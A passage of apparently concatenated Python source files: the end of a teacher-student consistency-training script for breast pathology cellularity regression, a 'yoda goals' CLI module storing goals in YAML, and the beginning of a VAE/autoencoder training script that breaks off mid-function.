end = time.time()
# print statistics and write summary every N batch
if (batch_idx + 1) % args.print_freq == 0:
print('Train: [{0}][{1}/{2}]\t'
'BT {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'DT {data_time.val:.3f} ({data_time.avg:.3f})\t'
'final_loss {final_loss.val:.3f} ({final_loss.avg:.3f})\t'
'Supervised_loss {Supervised_loss.val:.3f} ({Supervised_loss.avg:.3f})\t'
'Consistency_loss {Consistency_loss.val:.3f} ({Consistency_loss.avg:.3f})'.format(epoch, batch_idx + 1, len(labeled_train_loader), batch_time=batch_time,
data_time=data_time, final_loss=losses, Supervised_loss=losses_x, Consistency_loss=losses_u))
final_feats = torch.cat(total_feats).detach()
final_targets = torch.cat(total_targets).detach()
return losses.avg, losses_x.avg, losses_u.avg, final_feats, final_targets
def validate(args, model_student, classifier_student, val_loader, epoch):
# switch to evaluate mode
model_student.eval()
classifier_student.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
with torch.no_grad():
end = time.time()
for batch_idx, (input, target) in enumerate(tqdm(val_loader, disable=False)):
# Get inputs and target
input, target = input.float(), target.float()
# Move the variables to Cuda
input, target = input.cuda(), target.cuda()
# compute output ###############################
feats = model_student(input)
output = classifier_student(feats)
loss = F.mse_loss(output, target.view(-1, 1), reduction='mean')
# compute loss and accuracy ####################
batch_size = target.size(0)
losses.update(loss.item(), batch_size)
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# print statistics and write summary every N batch
if (batch_idx + 1) % args.print_freq == 0:
print('Val: [{0}][{1}/{2}]\t'
'BT {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'DT {data_time.val:.3f} ({data_time.avg:.3f})\t'
'loss {loss.val:.3f} ({loss.avg:.3f})'.format(epoch, batch_idx + 1, len(val_loader),
batch_time=batch_time, data_time=data_time, loss=losses))
return losses.avg
def test(args, model_student, classifier_student, test_loader):
# switch to evaluate mode
model_student.eval()
classifier_student.eval()
batch_time = AverageMeter()
losses = AverageMeter()
total_feats = []
total_output = []
total_targetA = []
total_targetB = []
with torch.no_grad():
end = time.time()
for batch_idx, (input, targetA, targetB) in enumerate(tqdm(test_loader, disable=False)):
# Get inputs and target
input, targetA, targetB = input.float(), targetA.float(), targetB.float()
# Move the variables to Cuda
input, targetA, targetB = input.cuda(), targetA.cuda(), targetB.cuda()
# compute output ###############################
feats = model_student(input)
output = classifier_student(feats)
#######
loss = F.mse_loss(output, targetA.view(-1, 1), reduction='mean')
# compute loss and accuracy
batch_size = targetA.size(0)
losses.update(loss.item(), batch_size)
# Save pred, target to calculate metrics
output = output.view(-1, 1).reshape(-1, )
total_output.append(output)
total_feats.append(feats)
total_targetA.append(targetA)
total_targetB.append(targetB)
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# print statistics and write summary every N batch
if (batch_idx + 1) % args.print_freq == 0:
print('Test: [{0}/{1}]\t'
'BT {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'loss {loss.val:.3f} ({loss.avg:.3f})'.format(
batch_idx, len(test_loader), batch_time=batch_time, loss=losses))
# Pred and target for performance metrics
final_outputs = torch.cat(total_output).to('cpu')
final_feats = torch.cat(total_feats).to('cpu')
final_targetsA = torch.cat(total_targetA).to('cpu')
final_targetsB = torch.cat(total_targetB).to('cpu')
return final_outputs, final_feats, final_targetsA, final_targetsB
def parse_args():
parser = argparse.ArgumentParser('Argument for BreastPathQ - Consistency training/Evaluation')
parser.add_argument('--print_freq', type=int, default=10, help='print frequency')
parser.add_argument('--save_freq', type=int, default=10, help='save frequency')
parser.add_argument('--gpu', default='0', help='GPU id to use.')
parser.add_argument('--num_workers', type=int, default=8, help='num of workers to use.')
parser.add_argument('--seed', type=int, default=42, help='seed for initializing training.')
# model definition
parser.add_argument('--model', type=str, default='resnet18', help='choice of network architecture.')
parser.add_argument('--mode', type=str, default='fine-tuning', help='fine-tuning/evaluation')
parser.add_argument('--modules_teacher', type=int, default=64,
help='which modules to freeze for the fine-tuned teacher model. (full-finetune(0), fine-tune only FC layer (60). Full_network(64) - Resnet18')
parser.add_argument('--modules_student', type=int, default=60,
help='which modules to freeze for fine-tuning the student model. (full-finetune(0), fine-tune only FC layer (60) - Resnet18')
parser.add_argument('--num_classes', type=int, default=1, help='# of classes.')
parser.add_argument('--num_epoch', type=int, default=90, help='epochs to train for.')
parser.add_argument('--batch_size', type=int, default=4, help='batch_size - 48/64.')
parser.add_argument('--mu', default=7, type=int, help='coefficient of unlabeled batch size - 7')
parser.add_argument('--NAug', default=7, type=int, help='No of Augmentations for strong unlabeled data')
parser.add_argument('--lr', default=0.0001, type=float, help='learning rate. - 1e-4(Adam)')
parser.add_argument('--weight_decay', default=1e-4, type=float,
help='weight decay/weights regularizer for sgd. - 1e-4')
parser.add_argument('--beta1', default=0.9, type=float, help='momentum for sgd, beta1 for adam.')
parser.add_argument('--beta2', default=0.999, type=float, help=' beta2 for adam.')
parser.add_argument('--lambda_u', default=1, type=float, help='coefficient of unlabeled loss')
# Consistency training
parser.add_argument('--model_path_finetune', type=str,
default='/home/csrinidhi/SSL_Eval/Save_Results/SSL/0.1/',
help='path to load SSL fine-tuned model to intialize "Teacher and student network" for consistency training')
parser.add_argument('--model_save_pth', type=str,
default='/home/srinidhi/Research/Code/SSL_Resolution/Save_Results/Results/Cellularity/Results/', help='path to save consistency trained model')
parser.add_argument('--save_loss', type=str,
default='/home/srinidhi/Research/Code/SSL_Resolution/Save_Results/Results/Cellularity/Results/',
help='path to save loss and other performance metrics')
# Testing
parser.add_argument('--model_path_eval', type=str,
default='/home/srinidhi/Research/Code/SSL_Resolution/Save_Results/Results/Cellularity/Results/',
help='path to load consistency trained model')
# Data paths
parser.add_argument('--train_image_pth',
default='/home/srinidhi/Research/Data/Cellularity/Tumor_Cellularity_Compare/TrainSet/')
parser.add_argument('--test_image_pth',
default='/home/srinidhi/Research/Data/Cellularity/Tumor_Cellularity_Compare/')
parser.add_argument('--validation_split', default=0.2, type=float,
help='portion of the data that will be used for validation')
parser.add_argument('--labeled_train', default=0.1, type=float,
help='portion of the train data with labels - 1(full), 0.1/0.25/0.5')
# Tiling parameters
parser.add_argument('--image_size', default=256, type=int, help='patch size width 256')
args = parser.parse_args()
return args
def main():
# parse the args
args = parse_args()
# Set the data loaders (train, val, test)
### BreastPathQ ##################
if args.mode == 'fine-tuning':
# Train set
transform_train = transforms.Compose([]) # None
train_labeled_dataset = DatasetBreastPathQ_Supervised_train(args.train_image_pth, args.image_size, transform=transform_train)
train_unlabeled_dataset = DatasetBreastPathQ_SSLtrain(args.train_image_pth, transform=TransformFix(args.image_size, args.NAug))
# Validation set
transform_val = transforms.Compose([transforms.Resize(size=args.image_size)])
val_dataset = DatasetBreastPathQ_SSLtrain(args.train_image_pth, transform=transform_val)
# train and validation split
num_train = len(train_labeled_dataset.datalist)
indices = list(range(num_train))
split = int(np.floor(args.validation_split * num_train))
np.random.shuffle(indices)
train_idx, val_idx = indices[split:], indices[:split]
#### Semi-Supervised Split (10, 25, 50, 100)
labeled_train_idx = np.random.choice(train_idx, int(args.labeled_train * len(train_idx)))
unlabeled_train_sampler = SubsetRandomSampler(train_idx)
labeled_train_sampler = SubsetRandomSampler(labeled_train_idx)
val_sampler = SubsetRandomSampler(val_idx)
# Data loaders
labeled_train_loader = torch.utils.data.DataLoader(train_labeled_dataset, batch_size=args.batch_size, sampler=labeled_train_sampler,
shuffle=True if labeled_train_sampler is None else False, num_workers=args.num_workers, pin_memory=True, drop_last=True)
unlabeled_train_loader = torch.utils.data.DataLoader(train_unlabeled_dataset, batch_size=args.batch_size*args.mu, sampler=unlabeled_train_sampler,
shuffle=True if unlabeled_train_sampler is None else False, num_workers=args.num_workers, pin_memory=True, drop_last=True)
val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=args.batch_size, sampler=val_sampler,
shuffle=False, num_workers=args.num_workers, pin_memory=True, drop_last=False)
# number of samples
num_label_data = len(labeled_train_sampler)
print('number of labeled training samples: {}'.format(num_label_data))
num_unlabel_data = len(unlabeled_train_sampler)
print('number of unlabeled training samples: {}'.format(num_unlabel_data))
num_val_data = len(val_sampler)
print('number of validation samples: {}'.format(num_val_data))
elif args.mode == 'evaluation':
# Test set
test_transforms = transforms.Compose([transforms.Resize(size=args.image_size)])
test_dataset = DatasetBreastPathQ_eval(args.test_image_pth, args.image_size, test_transforms)
test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=args.batch_size, shuffle=False,
num_workers=args.num_workers, pin_memory=True)
# number of samples
n_data = len(test_dataset)
print('number of testing samples: {}'.format(n_data))
else:
raise NotImplementedError('invalid mode {}'.format(args.mode))
########################################
# set the model
if args.model == 'resnet18':
model_teacher = net.TripletNet_Finetune(args.model)
model_student = net.TripletNet_Finetune(args.model)
classifier_teacher = net.FinetuneResNet(args.num_classes)
classifier_student = net.FinetuneResNet(args.num_classes)
if args.mode == 'fine-tuning':
###### Intialize both teacher and student network with fine-tuned SSL model ###############
# Load model
state_dict = torch.load(args.model_path_finetune)
# Load fine-tuned model
model_teacher.load_state_dict(state_dict['model'])
model_student.load_state_dict(state_dict['model'])
# Load fine-tuned classifier
classifier_teacher.load_state_dict(state_dict['classifier'])
classifier_student.load_state_dict(state_dict['classifier'])
################# Freeze Teacher model (Entire network) ####################
# look at the contents of the teacher model and freeze it
idx = 0
for layer_name, param in model_teacher.named_parameters():
print(layer_name, '-->', idx)
idx += 1
# Freeze the teacher model
for name, param in enumerate(model_teacher.named_parameters()):
if name < args.modules_teacher: # No of layers(modules) to be freezed
print("module", name, "was frozen")
param = param[1]
param.requires_grad = False
else:
print("module", name, "was not frozen")
param = param[1]
param.requires_grad = True
############## Freeze Student model (Except last FC layer) #########################
# look at the contents of the student model and freeze it
idx = 0
for layer_name, param in model_student.named_parameters():
print(layer_name, '-->', idx)
idx += 1
# Freeze the teacher model
for name, param in enumerate(model_student.named_parameters()):
if name < args.modules_student: # No of layers(modules) to be freezed
print("module", name, "was frozen")
param = param[1]
param.requires_grad = False
else:
print("module", name, "was not frozen")
param = param[1]
param.requires_grad = True
elif args.mode == 'evaluation':
# Load fine-tuned model
state = torch.load(args.model_path_eval)
# create new OrderedDict that does not contain `module.`
new_state_dict = OrderedDict()
for k, v in state['model_student'].items():
name = k[7:] # remove `module.`
new_state_dict[name] = v
model_student.load_state_dict(new_state_dict)
# create new OrderedDict that does not contain `module.`
new_state_dict_cls = OrderedDict()
for k, v in state['classifier_student'].items():
name = k[7:] # remove `module.`
new_state_dict_cls[name] = v
classifier_student.load_state_dict(new_state_dict_cls)
else:
raise NotImplementedError('invalid training {}'.format(args.mode))
else:
raise NotImplementedError('model not supported {}'.format(args.model))
# Load model to CUDA
if torch.cuda.is_available():
model_teacher = torch.nn.DataParallel(model_teacher)
model_student = torch.nn.DataParallel(model_student)
classifier_teacher = torch.nn.DataParallel(classifier_teacher)
classifier_student = torch.nn.DataParallel(classifier_student)
cudnn.benchmark = True
# Optimiser & scheduler
optimizer = optim.Adam(filter(lambda p: p.requires_grad, list(model_student.parameters()) + list(classifier_student.parameters())), lr=args.lr, betas=(args.beta1, args.beta2), weight_decay=args.weight_decay)
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[30, 60], gamma=0.1)
# Training Model
start_epoch = 1
prev_best_val_loss = float('inf')
# Start log (writing into XL sheet)
with open(os.path.join(args.save_loss, 'fine_tuned_results.csv'), 'w') as f:
f.write('epoch, train_loss, train_losses_x, train_losses_u, val_loss\n')
# Routine
for epoch in range(start_epoch, args.num_epoch + 1):
if args.mode == 'fine-tuning':
print("==> fine-tuning the pretrained SSL model...")
time_start = time.time()
train_losses, train_losses_x, train_losses_u, final_feats, final_targets = train(args, model_teacher, model_student, classifier_teacher, classifier_student, labeled_train_loader, unlabeled_train_loader, optimizer, epoch)
print('Epoch time: {:.2f} s.'.format(time.time() - time_start))
print("==> validating the fine-tuned model...")
val_losses = validate(args, model_student, classifier_student, val_loader, epoch)
# Log results
with open(os.path.join(args.save_loss, 'fine_tuned_results.csv'), 'a') as f:
f.write('%03d,%0.6f,%0.6f,%0.6f,%0.6f,\n' % ((epoch + 1), train_losses, train_losses_x, train_losses_u, val_losses))
'adjust learning rate --- Note that step should be called after validate()'
scheduler.step()
# Iterative training: Use the student as a teacher after every epoch
model_teacher = copy.deepcopy(model_student)
classifier_teacher = copy.deepcopy(classifier_student)
# Save model every 10 epochs
if epoch % args.save_freq == 0:
print('==> Saving...')
state = {
'args': args,
'model_student': model_student.state_dict(),
'model_teacher': model_teacher.state_dict(),
'classifier_teacher': classifier_teacher.state_dict(),
'classifier_student': classifier_student.state_dict(),
'optimizer': optimizer.state_dict(),
'epoch': epoch,
'train_loss': train_losses,
'train_losses_x': train_losses_x,
'train_losses_u': train_losses_u,
}
torch.save(state, '{}/fine_CR_trained_model_{}.pt'.format(args.model_save_pth, epoch))
# help release GPU memory
del state
torch.cuda.empty_cache()
# Save model for the best val
if (val_losses < prev_best_val_loss) & (epoch>1):
print('==> Saving...')
state = {
'args': args,
'model_student': model_student.state_dict(),
'model_teacher': model_teacher.state_dict(),
'classifier_teacher': classifier_teacher.state_dict(),
'classifier_student': classifier_student.state_dict(),
'optimizer': optimizer.state_dict(),
'epoch': epoch,
'train_loss': train_losses,
'train_losses_x': train_losses_x,
'train_losses_u': train_losses_u,
}
torch.save(state, '{}/best_CR_trained_model_{}.pt'.format(args.model_save_pth, epoch))
prev_best_val_loss = val_losses
# help release GPU memory
del state
torch.cuda.empty_cache()
elif args.mode == 'evaluation':
print("==> testing final test data...")
final_predicitions, final_feats, final_targetsA, final_targetsB = test(args, model_student, classifier_student, test_loader)
final_predicitions = final_predicitions.numpy()
final_targetsA = final_targetsA.numpy()
final_targetsB = final_targetsB.numpy()
# BreastPathQ dataset #######
d = {'targets': np.hstack(
[np.arange(1, len(final_predicitions) + 1, 1), np.arange(1, len(final_predicitions) + 1, 1)]),
'raters': np.hstack([np.tile(np.array(['M']), len(final_predicitions)),
np.tile(np.array(['A']), len(final_predicitions))]),
'scores': np.hstack([final_predicitions, final_targetsA])}
df = pd.DataFrame(data=d)
iccA = pg.intraclass_corr(data=df, targets='targets', raters='raters', ratings='scores')
iccA.to_csv(os.path.join(args.save_loss, 'BreastPathQ_ICC_Eval_2way_MA.csv'))
print(iccA)
d = {'targets': np.hstack(
[np.arange(1, len(final_predicitions) + 1, 1), np.arange(1, len(final_predicitions) + 1, 1)]),
'raters': np.hstack([np.tile(np.array(['M']), len(final_predicitions)),
np.tile(np.array(['B']), len(final_predicitions))]),
'scores': np.hstack([final_predicitions, final_targetsB])}
df = pd.DataFrame(data=d)
iccB = pg.intraclass_corr(data=df, targets='targets', raters='raters', ratings='scores')
iccB.to_csv(os.path.join(args.save_loss, 'BreastPathQ_ICC_Eval_2way_MB.csv'))
print(iccB)
d = {'targets': np.hstack(
[np.arange(1, len(final_targetsA) + 1, 1), np.arange(1, len(final_targetsB) + 1, 1)]),
'raters': np.hstack(
[np.tile(np.array(['A']), len(final_targetsA)), np.tile(np.array(['B']), len(final_targetsB))]),
'scores': np.hstack([final_targetsA, final_targetsB])}
df = pd.DataFrame(data=d)
iccC = pg.intraclass_corr(data=df, targets='targets', raters='raters', ratings='scores')
iccC.to_csv(os.path.join(args.save_loss, 'BreastPathQ_ICC_Eval_2way_AB.csv'))
print(iccC)
# Plots
fig, ax = plt.subplots() # P1 vs automated
ax.scatter(final_targetsA, final_predicitions, edgecolors=(0, 0, 0))
ax.plot([final_targetsA.min(), final_targetsA.max()], [final_targetsA.min(), final_targetsA.max()], 'k--',
lw=2)
ax.set_xlabel('Pathologist1')
ax.set_ylabel('Automated Method')
plt.savefig(os.path.join(args.save_loss, 'BreastPathQ_Eval_2way_MA_plot.png'), dpi=300)
plt.show()
fig, ax = plt.subplots() # P2 vs automated
ax.scatter(final_targetsB, final_predicitions, edgecolors=(0, 0, 0))
ax.plot([final_targetsB.min(), final_targetsB.max()], [final_targetsB.min(), final_targetsB.max()], 'k--',
lw=2)
ax.set_xlabel('Pathologist2')
ax.set_ylabel('Automated Method')
plt.savefig(os.path.join(args.save_loss, 'BreastPathQ_Eval_2way_MB_plot.png'), dpi=300)
plt.show()
fig, ax = plt.subplots() # P1 vs P2
ax.scatter(final_targetsA, final_targetsB, edgecolors=(0, 0, 0))
ax.plot([final_targetsA.min(), final_targetsA.max()], [final_targetsA.min(), final_targetsA.max()], 'k--',
lw=2)
ax.set_xlabel('Pathologist1')
ax.set_ylabel('Pathologist2')
plt.savefig(os.path.join(args.save_loss, 'BreastPathQ_Eval_2way_AB_plot.png'), dpi=300)
plt.show()
# Bland altman plot
fig, ax = plt.subplots(1, figsize=(8, 8))
sm.graphics.mean_diff_plot(final_targetsA, final_predicitions, ax=ax)
plt.savefig(os.path.join(args.save_loss, 'BDPlot_Eval_2way_MA_plot.png'), dpi=300)
plt.show()
fig, ax = plt.subplots(1, figsize=(8, 8))
sm.graphics.mean_diff_plot(final_targetsB, final_predicitions, ax=ax)
plt.savefig(os.path.join(args.save_loss, 'BDPlot_Eval_2way_MB_plot.png'), dpi=300)
plt.show()
fig, ax = plt.subplots(1, figsize=(8, 8))
sm.graphics.mean_diff_plot(final_targetsA, final_targetsB, ax=ax)
plt.savefig(os.path.join(args.save_loss, 'BDPlot_Eval_2way_AB_plot.png'), dpi=300)
plt.show()
else:
raise NotImplementedError('mode not supported {}'.format(args.mode))
if __name__ == "__main__":
args = parse_args()
print(vars(args))
# Force the pytorch to create context on the specific device
os.environ["CUDA_VISIBLE_DEVICES"] = str(args.gpu)
if args.seed:
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.gpu:
torch.cuda.manual_seed_all(args.seed)
# Main function
main()
|
python
|
from __future__ import absolute_import
import datetime
from .config import get_config_file_paths
from .util import *
# config file path
GOALS_CONFIG_FILE_PATH = get_config_file_paths()['GOALS_CONFIG_FILE_PATH']
GOALS_CONFIG_FOLDER_PATH = get_folder_path_from_file_path(
GOALS_CONFIG_FILE_PATH)
def strike(text):
"""
strikethrough text
:param text:
:return:
"""
return u'\u0336'.join(text) + u'\u0336'
def get_goal_file_path(goal_name):
return GOALS_CONFIG_FOLDER_PATH + '/' + goal_name + '.yaml'
def process(input):
"""
the main process
:param input:
"""
_input = input.lower().strip()
check_sub_command(_input)
def check_sub_command(c):
"""
command checker
:param c:
:return:
"""
sub_commands = {
'new': new_goal,
'tasks': view_related_tasks,
'view': list_goals,
'complete': complete_goal,
'analyze': goals_analysis,
}
try:
return sub_commands[c]()
except KeyError:
click.echo(chalk.red('Command does not exist!'))
click.echo('Try "yoda goals --help" for more info')
def goals_dir_check():
"""
check if goals directory exists. If not, create
"""
if not os.path.exists(GOALS_CONFIG_FOLDER_PATH):
try:
os.makedirs(GOALS_CONFIG_FOLDER_PATH)
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
def append_data_into_file(data, file_path):
"""
append data into existing file
:param data:
:param file_path:
"""
with open(file_path) as file:
# read contents
contents = yaml.load(file)
contents['entries'].append(
data
)
# enter data
with open(file_path, "w") as file:
yaml.dump(contents, file, default_flow_style=False)
def complete_goal():
"""
complete a goal
"""
not_valid_goal_number = 1
if os.path.isfile(GOALS_CONFIG_FILE_PATH):
with open(GOALS_CONFIG_FILE_PATH) as todays_tasks_entry:
contents = yaml.load(todays_tasks_entry)
i = 0
no_goal_left = True
for entry in contents['entries']:
i += 1
if entry['status'] == 0:
no_goal_left = False
if no_goal_left:
click.echo(chalk.green(
'All goals have been completed! Add a new goal by entering "yoda goals new"'))
else:
click.echo('Goals:')
click.echo('----------------')
click.echo("Number | Deadline | Goal")
click.echo("-------|-------------|-----")
i = 0
for entry in contents['entries']:
i += 1
deadline = entry['deadline']
text = entry['text'] if entry['status'] == 0 else strike(
entry['text'])
if entry['status'] == 0:
click.echo(" " + str(i) + " | " +
deadline + " | " + text)
while not_valid_goal_number:
click.echo(chalk.blue(
'Enter the goal number that you would like to set as completed'))
goal_to_be_completed = int(input())
if goal_to_be_completed > len(contents['entries']):
click.echo(chalk.red('Please Enter a valid goal number!'))
else:
contents['entries'][goal_to_be_completed - 1]['status'] = 1
input_data(contents, GOALS_CONFIG_FILE_PATH)
not_valid_goal_number = 0
else:
click.echo(chalk.red(
'There are no goals set. Set a new goal by entering "yoda goals new"'))
def goal_name_exists(goal_name):
file_name = get_goal_file_path(goal_name)
return os.path.isfile(file_name)
def new_goal():
"""
new goal
"""
goals_dir_check()
goal_name_not_ok = True
click.echo(chalk.blue('Input a single-word name of the goal:'))
while goal_name_not_ok:
goal_name = input().strip()
if goal_name.isalnum():
goal_name_not_ok = False
else:
click.echo(chalk.red('Only alphanumeric characters can be used! Please input the goal name:'))
if goal_name_exists(goal_name):
click.echo(chalk.red(
'A goal with this name already exists. Please type "yoda goals view" to see a list of existing goals'))
else:
click.echo(chalk.blue('Input description of the goal:'))
text = input().strip()
click.echo(chalk.blue('Input due date for the goal (YYYY-MM-DD):'))
incorrect_date_format = True
while incorrect_date_format:
deadline = input().strip()
try:
date_str = datetime.datetime.strptime(deadline, '%Y-%m-%d').strftime('%Y-%m-%d')
if date_str != deadline:
raise ValueError
incorrect_date_format = False
except ValueError:
click.echo(chalk.red("Incorrect data format, should be YYYY-MM-DD. Please repeat:"))
if os.path.isfile(GOALS_CONFIG_FILE_PATH):
setup_data = dict(
name=goal_name,
text=text,
deadline=deadline,
status=0
)
append_data_into_file(setup_data, GOALS_CONFIG_FILE_PATH)
else:
setup_data = dict(
entries=[
dict(
name=goal_name,
text=text,
deadline=deadline,
status=0
)
]
)
input_data(setup_data, GOALS_CONFIG_FILE_PATH)
input_data(dict(entries=[]), get_goal_file_path(goal_name))
def goals_analysis():
"""
goals alysis
"""
now = datetime.datetime.now()
total_goals = 0
total_incomplete_goals = 0
total_missed_goals = 0
total_goals_next_week = 0
total_goals_next_month = 0
if os.path.isfile(GOALS_CONFIG_FILE_PATH):
with open(GOALS_CONFIG_FILE_PATH) as goals_file:
contents = yaml.load(goals_file)
for entry in contents['entries']:
total_goals += 1
if entry['status'] == 0:
total_incomplete_goals += 1
deadline = datetime.datetime.strptime(entry['deadline'], '%Y-%m-%d')
total_missed_goals += (1 if deadline < now else 0)
total_goals_next_week += (1 if (deadline-now).days <= 7 else 0)
total_goals_next_month += (1 if (deadline - now).days <= 30 else 0)
percent_incomplete_goals = total_incomplete_goals * 100 / total_goals
percent_complete_goals = 100 - percent_incomplete_goals
click.echo(chalk.red('Percentage of incomplete goals : ' + str(percent_incomplete_goals)))
click.echo(chalk.green('Percentage of completed goals : ' + str(percent_complete_goals)))
click.echo(chalk.blue('Number of missed deadlines : ' + str(total_missed_goals)))
click.echo(chalk.blue('Number of goals due within the next week : ' + str(total_goals_next_week)))
click.echo(chalk.blue('Number of goals due within the next month : ' + str(total_goals_next_month)))
else:
click.echo(chalk.red(
'There are no goals set. Set a new goal by entering "yoda goals new"'))
def add_task_to_goal(goal_name, date, timestamp):
goal_filename = get_goal_file_path(goal_name)
if os.path.isfile(goal_filename):
setup_data = dict(
date=date,
timestamp=timestamp
)
append_data_into_file(setup_data, goal_filename)
return True
return False
def list_goals():
"""
get goals listed chronologically by deadlines
"""
if os.path.isfile(GOALS_CONFIG_FILE_PATH):
with open(GOALS_CONFIG_FILE_PATH) as goals_file:
contents = yaml.load(goals_file)
if len(contents):
contents['entries'].sort(key=lambda x: x['deadline'].split('-'))
click.echo('Goals')
click.echo('----------------')
click.echo("Status | Deadline | Name: text")
click.echo("-------|-------------|---------------")
incomplete_goals = 0
total_tasks = 0
total_missed_deadline = 0
for entry in contents['entries']:
total_tasks += 1
incomplete_goals += (1 if entry['status'] == 0 else 0)
deadline = entry['deadline']
name = entry['name']
text = entry['text'] if entry['status'] == 0 else strike(
entry['text'])
status = "O" if entry['status'] == 0 else "X"
deadline_time = datetime.datetime.strptime(deadline, '%Y-%m-%d')
now = datetime.datetime.now()
total_missed_deadline += (1 if deadline_time < now else 0)
click.echo(" " + status + " | " + deadline + " | #" + name + ": " + text)
click.echo('----------------')
click.echo('')
click.echo('Summary:')
click.echo('----------------')
if incomplete_goals == 0:
click.echo(chalk.green(
'All goals have been completed! Set a new goal by entering "yoda goals new"'))
else:
click.echo(chalk.red("Incomplete tasks: " + str(incomplete_goals)))
click.echo(chalk.red("Tasks with missed deadline: " + str(total_missed_deadline)))
click.echo(chalk.green("Completed tasks: " +
str(total_tasks - incomplete_goals)))
else:
click.echo(
'There are no goals set. Set a new goal by entering "yoda goals new"')
else:
click.echo(
'There are no goals set. Set a new goal by entering "yoda goals new"')
def view_related_tasks():
"""
list tasks assigned to the goal
"""
from .diary import get_task_info
not_valid_name = True
if os.path.isfile(GOALS_CONFIG_FILE_PATH):
while not_valid_name:
click.echo(chalk.blue(
'Enter the goal name that you would like to examine'))
goal_name = input()
goal_file_name = get_goal_file_path(goal_name)
if os.path.isfile(goal_file_name):
not_valid_name = False
with open(goal_file_name) as goals_file:
contents = yaml.load(goals_file)
if len(contents['entries']):
total_tasks = 0
total_incomplete = 0
click.echo('Tasks assigned to the goal:')
click.echo('----------------')
click.echo("Status | Date | Text")
click.echo("-------|---------|-----")
for entry in contents['entries']:
timestamp = entry['timestamp']
date = entry['date']
status, text = get_task_info(timestamp, date)
total_tasks += 1
total_incomplete += (1 if status == 0 else 0)
text = text if status == 0 else strike(text)
status = "O" if status == 0 else "X"
click.echo(" " + status + " | " + date + "| " + text)
click.echo('----------------')
click.echo('')
click.echo('Summary:')
click.echo('----------------')
click.echo(chalk.red("Incomplete tasks assigned to the goal: " + str(total_incomplete)))
click.echo(chalk.green("Completed tasks assigned to the goal: " +
str(total_tasks - total_incomplete)))
else:
click.echo(chalk.red(
'There are no tasks assigned to the goal. Add a new task by entering "yoda diary nt"'))
else:
click.echo(chalk.red(
'There are no goals set. Set a new goal by entering "yoda goals new"'))
|
python
|
from __future__ import absolute_import
import argparse
import os
import sys
# sys.path.append(".")
import time
import torch
from tensorboardX import SummaryWriter
from metrics.evaluation import evaluate
from metrics.vae_metrics import VaeEvaluator
from struct_self.dataset import Dataset
from struct_self.dataset import to_example
from utils.config_utils import dict_to_args
from utils.config_utils import yaml_load_dict
from utils.vae_utils import get_eval_dir
from utils.vae_utils import get_exp_info
from utils.vae_utils import create_model
from utils.vae_utils import load_data
from utils.vae_utils import load_model
from utils.vae_utils import log_tracker
from utils.vae_utils import lr_schedule
def train_ae(main_args, model_args, model=None):
train_set, dev_set = load_data(main_args)
model, optimizer, vocab = create_model(main_args, model_args, model)
print('begin training, %d training examples, %d dev examples' % (len(train_set), len(dev_set)), file=sys.stderr)
print('vocab: %s' % repr(vocab.src), file=sys.stderr)
epoch = 0
train_iter = 0
report_loss = report_examples = 0.
history_dev_scores = []
num_trial = patience = 0
model_dir, log_dir = get_exp_info(main_args=main_args, model_args=model_args)
model_file = model_dir + '.bin'
writer = SummaryWriter(log_dir)
while True:
epoch += 1
epoch_begin = time.time()
for batch_examples in train_set.batch_iter(batch_size=main_args.batch_size, shuffle=True):
train_iter += 1
optimizer.zero_grad()
loss = -model.score(batch_examples)
loss_val = torch.sum(loss).item()
report_loss += loss_val
report_examples += len(batch_examples)
loss = torch.mean(loss)
loss.backward()
if main_args.clip_grad > 0.:
torch.nn.utils.clip_grad_norm_(model.parameters(), main_args.clip_grad)
optimizer.step()
if train_iter % main_args.log_every == 0:
print('\r[Iter %d] encoder loss=%.5f' %
(train_iter,
report_loss / report_examples),
file=sys.stderr, end=" ")
writer.add_scalar(
tag='AutoEncoder/Train/loss',
scalar_value=report_loss / report_examples,
global_step=train_iter
)
writer.add_scalar(
tag='optimize/lr',
scalar_value=optimizer.param_groups[0]['lr'],
global_step=train_iter,
)
report_loss = report_examples = 0.
if train_iter % main_args.dev_every == 0:
print()
print('\r[Iter %d] begin validation' % train_iter, file=sys.stderr)
eval_start = time.time()
eval_results = evaluate(examples=dev_set.examples, model=model, eval_src='src', eval_tgt='src')
dev_acc = eval_results['accuracy']
print('\r[Iter %d] auto_encoder %s=%.5f took %ds' % (
train_iter, model.args.eval_mode, dev_acc, time.time() - eval_start),
file=sys.stderr)
writer.add_scalar(
tag='AutoEncoder/Dev/%s' % model.args.eval_mode,
scalar_value=dev_acc,
global_step=train_iter
)
is_better = history_dev_scores == [] or dev_acc > max(history_dev_scores)
history_dev_scores.append(dev_acc)
writer.add_scalar(
tag='AutoEncoder/Dev/best %s' % model.args.eval_mode,
scalar_value=max(history_dev_scores),
global_step=train_iter
)
model, optimizer, num_trial, patience = lr_schedule(
is_better=is_better,
model_dir=model_dir,
model_file=model_file,
main_args=main_args,
patience=patience,
num_trial=num_trial,
epoch=epoch,
model=model,
optimizer=optimizer,
reload_model=False
)
epoch_time = time.time() - epoch_begin
print('\r[Epoch %d] epoch elapsed %ds' % (epoch, epoch_time), file=sys.stderr)
writer.add_scalar(
tag='AutoEncoder/epoch elapsed',
scalar_value=epoch_time,
global_step=epoch
)
def train_vae(main_args, model_args, model=None):
ts = time.strftime('%Y-%b-%d-%H:%M:%S', time.gmtime())
train_set, dev_set = load_data(main_args)
model, optimizer, vocab = create_model(main_args, model_args, model)
model_dir, logdir = get_exp_info(main_args=main_args, model_args=model_args)
model_file = model_dir + '.bin'
eval_dir = get_eval_dir(main_args=main_args, model_args=model_args, mode='Trains')
evaluator = VaeEvaluator(
model=model,
out_dir=eval_dir,
train_batch_size=main_args.batch_size,
eval_batch_size=model_args.eval_bs,
)
# if model_args.tensorboard_logging:
writer = SummaryWriter(logdir)
writer.add_text("model", str(model))
writer.add_text("args", str(main_args))
writer.add_text("ts", ts)
train_iter = main_args.start_iter
epoch = num_trial = patience = 0
history_elbo = []
history_bleu = []
